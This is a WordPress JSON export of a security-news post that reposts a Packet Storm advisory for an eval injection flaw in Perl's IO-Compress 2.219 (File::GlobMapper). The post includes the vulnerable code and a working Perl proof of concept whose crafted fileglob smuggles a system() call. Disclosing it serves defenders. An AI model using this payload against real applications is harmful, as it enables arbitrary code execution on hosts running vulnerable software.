{"id":61679,"date":"2026-06-10T11:44:52","date_gmt":"2026-06-10T11:44:52","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=61679"},"modified":"2026-06-10T11:44:52","modified_gmt":"2026-06-10T11:44:52","slug":"io-compress-2219-eval-injection","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=61679","title":{"rendered":"\ud83d\udcc4 IO-Compress 2.219 Eval Injection_PACKETSTORM:223138"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-06-10T16:00:05&#8243;,&#8221;description&#8221;:&#8221;An eval injection vulnerability in File::GlobMapper::getFiles allows any attacker who can control the output fileglob argument passed to IO::Compress::Gzip::gzip, IO::Compress::Zip::zip, or any sibling function to execute arbitrary Perl code in the&#8230;&#8221;,&#8221;published&#8221;:&#8221;2026-06-10T00:00:00&#8243;,&#8221;modified&#8221;:&#8221;2026-06-10T00:00:00&#8243;,&#8221;type&#8221;:&#8221;packetstorm&#8221;,&#8221;title&#8221;:&#8221;\ud83d\udcc4 IO-Compress 2.219 Eval Injection&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;PACKETSTORM:223138&#8243;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2026-48962&#8243;],&#8221;sourceData&#8221;:&#8221;### Summary\\n    \\n    An eval injection vulnerability in `File::GlobMapper::_getFiles()` allows any attacker who can control the output fileglob argument passed to `IO::Compress::Gzip::gzip()`, `IO::Compress::Zip::zip()`, or any sibling function to execute arbitrary Perl code in the context of the running process.\\n    No authentication is required. Impact is complete: confidentiality, integrity, and availability of the host process are fully compromised.\\n    \\n    &#8212;\\n    \\n    ### Details\\n    \\n    `File::GlobMapper::_parseOutputGlob()` builds an output filename template by wrapping the caller-supplied output pattern in Perl double-quotes and storing the result. `_getFiles()` then passes that string directly to `eval` without\\n    any sanitisation:\\n    \\n    **`lib\/File\/GlobMapper.pm:316\u2013321`**\\n    &#8220;`perl\\n    $string =~ s\/${noPreBS}#(\\\\d)\/\\\\${$1}\/g;\\n    $string =~ s#${noPreBS}\\\\*#\\\\${inFile}#g;\\n    $string = &#8216;\\&#8221;&#8216; . $string . &#8216;\\&#8221;&#8216;;      # wrapped in double-quotes\\n    $self-\\u003e{OutputPattern} = $string;   # stored verbatim \u2014 no escaping\\n    &#8220;`\\n    \\n    **`lib\/File\/GlobMapper.pm:342`**\\n    &#8220;`perl\\n    eval \\&#8221;\\\\$outFile = $self-\\u003e{OutputPattern};\\&#8221; ;   # executed \u2014 injection point\\n    &#8220;`\\n    \\n    `File::GlobMapper` is invoked automatically whenever **both** the input and output arguments to an `IO::Compress::*` \/ `IO::Uncompress::*` function are fileglob strings (delimited by `\\u003c \\u003e`). This is a documented, common calling\\n    convention. Affected functions include `gzip`, `zip`, `bzip2`, `deflate`, `rawdeflate`, and all `IO::Uncompress::*` counterparts.\\n    \\n    Any character that closes the surrounding double-quoted Perl string \u2014 a literal `\\&#8221;`, a backtick, `${&#8230;}`, or `@{&#8230;}` \u2014 followed by arbitrary Perl code is executed verbatim.\\n    \\n    &#8212;\\n    \\n    ### PoC\\n    \\n    Save as `poc.pl` and run with `perl poc.pl`:\\n    \\n    &#8220;`perl\\n    #!\/usr\/bin\/perl\\n    use strict;\\n    use warnings;\\n    use File::Temp qw(tempdir);\\n    use IO::Compress::Gzip qw(gzip);\\n    \\n    my $dir      = tempdir(CLEANUP =\\u003e 1);\\n    my $sentinel = \\&#8221;\/tmp\/CVE_GlobMapper_RCE_$$\\&#8221;;\\n    \\n    # Create a legitimate input file that the input glob will match\\n    open my $fh, &#8216;\\u003e&#8217;, \\&#8221;$dir\/test.txt\\&#8221; or die $!;\\n    print $fh \\&#8221;data\\\\n\\&#8221;;\\n    close $fh;\\n    \\n    my $malicious = qq(\\u003c$dir\/out.gz\\&#8221;; system(\\&#8221;touch $sentinel\\&#8221;); #\\u003e);\\n    \\n    print \\&#8221;Sentinel before: \\&#8221;, (-e $sentinel ? \\&#8221;EXISTS\\&#8221; : \\&#8221;absent\\&#8221;), \\&#8221;\\\\n\\&#8221;;\\n    \\n    eval { gzip \\&#8221;\\u003c$dir\/*.txt\\u003e\\&#8221; =\\u003e $malicious };\\n    \\n    if (-e $sentinel) {\\n        print \\&#8221;EXPLOITED \u2014 arbitrary command executed via eval injection\\\\n\\&#8221;;\\n        print \\&#8221;Sentinel: $sentinel\\\\n\\&#8221;;\\n        unlink $sentinel;\\n    } else {\\n        print \\&#8221;Did not fire (check error: $@)\\\\n\\&#8221;;\\n    }\\n    &#8220;`\\n    \\n    **Expected output:**\\n    &#8220;`\\n    Sentinel before: absent\\n    EXPLOITED \u2014 arbitrary command executed via eval injection\\n    Sentinel: \/tmp\/CVE_GlobMapper_RCE_\\u003cpid\\u003e\\n    &#8220;`\\n    \\n    Confirmed on IO-Compress 2.219 \/ Perl 5.40.1 \/ Ubuntu 26.04.\\n    \\n    &#8212;\\n    \\n    ### Impact\\n    \\n    This is a **remote code execution** vulnerability. Any web application, API service, CLI tool, or batch-processing pipeline that accepts user input and passes it as the output fileglob argument to any `IO::Compress::*` function is vulnerable. The injected code runs with the full privileges of the calling process.\\n    \\n    **Who is impacted:** Developers and operators of Perl applications that use `IO::Compress::*` functions with the fileglob calling convention and where the output pattern is derived from untrusted input &#8211; such as filename templates from web forms, REST API parameters, CLI arguments, or configuration files controlled by non-privileged users.\\n    \\n    In setuid or privileged-daemon contexts, exploitation yields code execution at the elevated privilege level. The bug has been present since the initial release of `File::GlobMapper` (\u2248 2005) and is present on every Linux distribution that ships the `perl` package.\\n    \\n    \\n    ### References\\n    \\n    &#8211; https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2026-48962\\n    &#8211; https:\/\/github.com\/pmqs\/IO-Compress\/commit\/f2db247bf90d4cc7ee2710be384946081f3b4610.patch\\n    &#8211; https:\/\/github.com\/pmqs\/IO-Compress\/issues\/73\\n    &#8211; https:\/\/metacpan.org\/release\/PMQS\/IO-Compress-2.220\/changes\\n    &#8211; http:\/\/www.openwall.com\/lists\/oss-security\/2026\/05\/27\/4\\n    &#8211; https:\/\/github.com\/advisories\/GHSA-q6wx-vhvq-x7h6&#8243;,&#8221;sourceHref&#8221;:&#8221;https:\/\/packetstorm.news\/download\/223138&#8243;,&#8221;cvss&#8221;:{&#8220;score&#8221;:7.3,&#8221;severity&#8221;:&#8221;HIGH&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:L\/I:L\/A:L&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/packetstorm.news\/files\/id\/223138\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2026-06-10T16:00:05&#8243;,&#8221;description&#8221;:&#8221;An eval injection vulnerability in File::GlobMapper::getFiles allows any attacker who can control the output fileglob argument passed to IO::Compress::Gzip::gzip, IO::Compress::Zip::zip, or any sibling function to&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,47,12,15,13,53,7,11,5],"class_list":["post-61679","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-73","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>\ud83d\udcc4 IO-Compress 2.219 Eval Injection_PACKETSTORM:223138 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=61679\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 IO-Compress 2.219 Eval Injection_PACKETSTORM:223138 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2026-06-10T16:00:05&#8243;,&#8221;description&#8221;:&#8221;An eval injection vulnerability in File::GlobMapper::getFiles allows any attacker who can control the output fileglob argument passed to IO::Compress::Gzip::gzip, IO::Compress::Zip::zip, or any sibling function to...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=61679\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-06-10T11:44:52+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=61679#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=61679\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 IO-Compress 2.219 Eval Injection_PACKETSTORM:223138\",\"datePublished\":\"2026-06-10T11:44:52+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=61679\"},\"wordCount\":806,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-7.3\",\"exploit\",\"HIGH\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=61679#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=61679\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=61679\",\"name\":\"\ud83d\udcc4 IO-Compress 2.219 Eval Injection_PACKETSTORM:223138 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-06-10T11:44:52+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=61679#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=61679\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=61679#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 IO-Compress 2.219 Eval Injection_PACKETSTORM:223138\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 IO-Compress 2.219 Eval Injection_PACKETSTORM:223138 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=61679","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 IO-Compress 2.219 Eval Injection_PACKETSTORM:223138 - zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2026-06-10T16:00:05&#8243;,&#8221;description&#8221;:&#8221;An eval injection vulnerability in File::GlobMapper::getFiles allows any attacker who can control the output fileglob argument passed to IO::Compress::Gzip::gzip, IO::Compress::Zip::zip, or any sibling function to...","og_url":"https:\/\/zero.redgem.net\/?p=61679","og_site_name":"zero redgem","article_published_time":"2026-06-10T11:44:52+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=61679#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=61679"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 IO-Compress 2.219 Eval Injection_PACKETSTORM:223138","datePublished":"2026-06-10T11:44:52+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=61679"},"wordCount":806,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-7.3","exploit","HIGH","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=61679#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=61679","url":"https:\/\/zero.redgem.net\/?p=61679","name":"\ud83d\udcc4 IO-Compress 2.219 Eval Injection_PACKETSTORM:223138 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-06-10T11:44:52+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=61679#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=61679"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=61679#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 IO-Compress 2.219 Eval Injection_PACKETSTORM:223138"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/61679","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=61679"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/61679\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=61679"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=61679"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=61679"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}